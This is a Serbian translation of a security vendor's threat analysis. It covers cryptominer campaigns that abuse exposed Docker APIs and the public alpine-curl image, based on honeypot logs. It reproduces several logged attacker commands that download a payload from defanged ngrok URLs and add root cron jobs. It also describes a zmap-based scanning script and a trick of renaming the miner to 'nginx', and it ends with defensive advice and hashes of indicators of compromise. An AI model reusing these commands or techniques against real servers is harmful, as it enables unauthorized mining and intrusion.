Како се не-власнички Доцкер АПИ и јавне слике из заједнице користе за дистрибуцију рудара криптовалута

Анализирали смо податке прикупљене помоћу хонеипот контејнера, које смо креирали за праћење претњи. Такође смо открили значајну активност нежељених или неовлашћених рудара криптовалута који су распоређени као лажни контејнери користећи слику објављену у заједници на Доцкер Хуб-у. Слика се користи као део услуге која испоручује злонамерне рударе криптовалута.

Поред тога, инсталирани су програми за рад са мрежама за продирање у отворене суседне контејнере и апликације.

Остављамо наше хонеипотс какве јесу, односно са подразумеваним подешавањима, без икаквих безбедносних мера или накнадне инсталације додатног софтвера. Имајте на уму да Доцкер има препоруке за почетно подешавање како би се избегле грешке и једноставне рањивости. Али коришћени хонеипотс су контејнери, дизајнирани да открију нападе усмерене на платформу за контејнеризацију, а не на апликације унутар контејнера.

Откривена злонамерна активност је такође приметна јер не захтева рањивости и такође је независна од Доцкер верзије. Проналажење погрешно конфигурисане и стога отворене слике контејнера је све што је нападачима потребно да заразе многе отворене сервере.

Незатворени Доцкер АПИ омогућава кориснику да изврши широк спектар timovima, укључујући добијање листе покренутих контејнера, добијање евиденције из одређеног контејнера, покретање, заустављање (укључујући принудно) па чак и креирање новог контејнера од одређене слике са одређеним подешавањима.

На левој страни је начин испоруке злонамерног софтвера. Десно је окружење нападача, које омогућава даљинско објављивање слика.

Дистрибуција по земљама 3762 отворена Доцкер АПИ-ја. На основу Сходан претраге од 12.02.2019

Опције ланца напада и носивости

Злонамерна активност је откривена не само уз помоћ меда. Подаци из Сходана показују да се број изложених Доцкер АПИ-ја (погледајте други графикон) повећао откако смо истражили погрешно конфигурисани контејнер који се користи као мост за примену софтвера за рударење криптовалута Монеро. У октобру прошле године (2018, актуелни подаци можете изгледати овако прибл. преводилац) било је само 856 отворених АПИ-ја.

Испитивање дневника хонеипот-а показало је да је коришћење слике контејнера такође повезано са употребом нгрок, алат за успостављање безбедних веза или прослеђивање саобраћаја са јавно доступних тачака на одређене адресе или ресурсе (на пример лоцалхост). Ово омогућава нападачима да динамички креирају УРЛ-ове када испоручују терет на отворени сервер. Испод су примери кода из евиденције који показују злоупотребу услуге нгрок:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Као што видите, отпремљене датотеке се преузимају са УРЛ адреса које се стално мењају. Ове УРЛ адресе имају кратак датум истека, тако да се корисни садржаји не могу преузети након истека.

Постоје две опције за корисни оптерећење. Прва је компајлирани рудар у ELF формату за Linux (идентификован као Coinminer.SH.MALXMR.ATNO), који се повезује са рударским пулом. Други је скрипта (TrojanSpy.SH.ZNETMAP.A), дизајнирана да добије одређене мрежне алате који се користе за скенирање мрежних опсега, а затим претрагу нових циљева.

Скрипта дроппер поставља две променљиве, које се затим користе за примену рудара криптовалута. ХОСТ променљива садржи УРЛ где се налазе злонамерне датотеке, а РИП променљива је име датотеке (у ствари, хеш) рудара који ће бити распоређен. ХОСТ променљива се мења сваки пут када се промени хеш променљива. Скрипта такође покушава да провери да на нападнутом серверу не ради ниједан други рудар криптовалута.

Примери ХОСТ и РИП променљивих, као и исечак кода који се користи за проверу да ниједан други рудар не ради

Пре покретања рудара, он се преименује у nginx. Друге верзије овог скрипта преименују рудара у друге легитимне сервисе који могу бити присутни у окружењу. LinuxОво је обично довољно да се заобиђу провере на листи покренутих процеса.

Скрипта за претрагу такође има карактеристике. Ради са истом УРЛ услугом за примену потребних алата. Међу њима је и змап бинарни, који се користи за скенирање мрежа и добијање листе отворених портова. Скрипта такође учитава другу бинарну датотеку која се користи за интеракцију са пронађеним сервисима и примање банера од њих да би се утврдиле додатне информације о пронађеној услузи (на пример, њена верзија).

Скрипта такође унапред одређује неке мрежне опсеге за скенирање, али то зависи од верзије скрипте. Такође поставља циљне портове из услуга—у овом случају, Доцкер—пре покретања скенирања.

Када се пронађу потенцијалне мете, банери се аутоматски уклањају са њих. Скрипта такође филтрира мете на основу сервиса, апликација, компоненти или платформи које је занимају: Redis, Jenkins, Drupal, MODX, Кубернетес Мастер, Доцкер 1.16 клијент и Апацхе ЦоуцхДБ. Ако се скенирани сервер подудара са било којим од њих, он се чува у текстуалној датотеци, коју нападачи касније могу користити за накнадну анализу и хаковање. Ове текстуалне датотеке се шаљу на сервере нападача путем динамичких веза. Односно, за сваку датотеку се користи засебан УРЛ, што значи да је накнадни приступ тежак.

Вектор напада је Доцкер слика, као што се може видети у следећа два дела кода.

На врху је преименовање у легитимну услугу, а на дну је како се змап користи за скенирање мрежа

На врху су унапред дефинисани мрежни опсези, на дну су специфични портови за тражење услуга, укључујући Доцкер

Снимак екрана показује да је слика алпског увојака преузета више од 10 милиона пута

На основу Алпина Linux и curl, CLI алат који ефикасно користи ресурсе за пренос датотека преко различитих протокола, може се компајлирати Доцкер слика. Као што видите на претходној слици, ова слика је већ преузета више од 10 милиона пута. Велики број преузимања може значити коришћење ове слике као улазне тачке; ова слика је ажурирана пре више од шест месеци; корисници нису толико често преузимали друге слике из овог спремишта. У Доцкер-у тачка уласка - скуп инструкција које се користе за конфигурисање контејнера за његово покретање. Ако су подешавања улазне тачке нетачна (на пример, контејнер је остављен отворен са Интернета), слика се може користити као вектор напада. Нападачи га могу користити за испоруку терета ако пронађу погрешно конфигурисан или отворен контејнер који није подржан.

Важно је напоменути да ова слика (алпине-цурл) сама по себи није злонамерна, али као што видите изнад, може се користити за обављање злонамерних функција. Сличне Доцкер слике се такође могу користити за обављање злонамерних активности. Контактирали смо Доцкер и радили са њима по овом питању.

Препоруке

Нетачно подешавање остаје стални проблем за многе компаније, посебно оне које имплементирају ДевОпс, фокусиран на брзи развој и испоруку. Све отежава потреба да се поштују правила ревизије и праћења, потреба да се прати поверљивост података, као и огромна штета од њиховог непоштовања. Укључивање безбедносне аутоматизације у животни циклус развоја не само да вам помаже да пронађете безбедносне рупе које би иначе могле да прођу неоткривене, већ вам такође помаже да смањите непотребно радно оптерећење, као што је покретање додатних верзија софтвера за сваку откривену рањивост или погрешну конфигурацију након што се апликација примени.

Инцидент о којем се говори у овом чланку наглашава потребу да се безбедност узме у обзир од самог почетка, укључујући следеће препоруке:

• За системске администраторе и програмере: Увек проверите подешавања АПИ-ја да бисте били сигурни да је све конфигурисано да прихвата само захтеве са одређеног сервера или интерне мреже.
• Придржавајте се принципа најмањег права: обезбедите да су слике контејнера потписане и верификоване, ограничите приступ критичним компонентама (услуга покретања контејнера) и додајте шифровање мрежним везама.
• Пратити препоруке и омогућити безбедносне механизме, нпр. из Доцкера и уграђени безбедносне функције.
• Користите аутоматизовано скенирање времена извођења и слика да бисте добили додатне информације о процесима који се покрећу у контејнеру (на пример, да бисте открили лажирање или претражили рањивости). Контрола апликација и праћење интегритета помажу у праћењу абнормалних промена на серверима, датотекама и системским областима.

Трендмицро помаже ДевОпс тимовима да безбедно граде, брзо уводе и покрећу било где. Тренд Мицро Безбедност хибридног облака Пружа моћну, модернизовану и аутоматизовану безбедност у целом ДевОпс цевоводу организације и пружа вишеструку одбрану од претњи КСГен да заштити физичка, виртуелна и облачна радна оптерећења током рада. Такође додаје сигурност контејнера са Дееп Сецурити и Паметна провера дубоке безбедности, који скенира слике Доцкер контејнера у потрази за злонамерним софтвером и рањивостима у било ком тренутку развојног процеса како би спречио претње пре него што се оне примене.

Знаци компромиса

Сродни хешови:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

На Доцкер видео курс Говорници који вежбају показују која подешавања прво треба извршити како би се смањила вероватноћа или потпуно избегла појава горе описане ситуације. И 19-21. августа на онлајн интензиву ДевОпс алати и варалице О овим и сличним безбедносним проблемима можете разговарати са колегама и наставницима практичарима за округлим столом, где свако може да проговори и саслуша болове и успехе искусних колега.

Извор: ввв.хабр.цом